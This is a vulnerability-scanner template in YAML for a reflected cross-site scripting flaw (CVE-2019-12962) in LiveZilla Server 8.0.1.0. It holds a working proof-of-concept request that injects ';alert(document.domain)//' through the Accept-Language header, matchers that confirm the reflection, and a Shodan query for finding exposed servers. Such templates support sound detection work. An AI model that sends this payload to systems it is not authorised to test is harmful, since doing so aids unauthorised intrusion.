id: CVE-2019-12962 info: name: LiveZilla Server 8.0.1.0 - Cross-Site Scripting author: Clment Cruchet severity: medium description: | LiveZilla Server 8.0.1.0 is vulnerable to reflected cross-site scripting. remediation: | Upgrade to the latest version of LiveZilla Server or apply the vendor-provided patch to mitigate this vulnerability. reference: - https://www.exploit-db.com/exploits/49669 - https://forums.livezilla.net/index.php?/topic/10984-fg-vd-19-083085087-livezilla-server-are-vulnerable-to-cross-site-scripting-in-admin-panel/ - http://packetstormsecurity.com/files/161867/LiveZilla-Server-8.0.1.0-Cross-Site-Scripting.html - https://nvd.nist.gov/vuln/detail/CVE-2019-12962 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2019-12962 cwe-id: CWE-79 epss-score: 0.20689 epss-percentile: 0.9588 cpe: cpe:2.3:a:livezilla:livezilla:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 vendor: livezilla product: livezilla shodan-query: http.html:LiveZilla tags: xss,edb,packetstorm,cve,cve2019,livezilla http: - method: GET path: - '{{BaseURL}}/mobile/index.php' headers: Accept-Language: ';alert(document.domain)//' matchers-condition: and matchers: - type: word part: body words: - "var detectedLanguage = ';alert(document.domain)//';" - type: word part: header words: - "text/html" - type: status status: - 200 # digest: 4b0a00483046022100c163841592d6f9f415845b9d2c9ab864fe54d0c30dc43ca789f92c6be7cc3ac4022100e15ede3ce78ced45a1d6c5d0c3321c674b9d7bb133a3301df57fa5077cad2f79:922c64590222798bb761d5b6d8e72950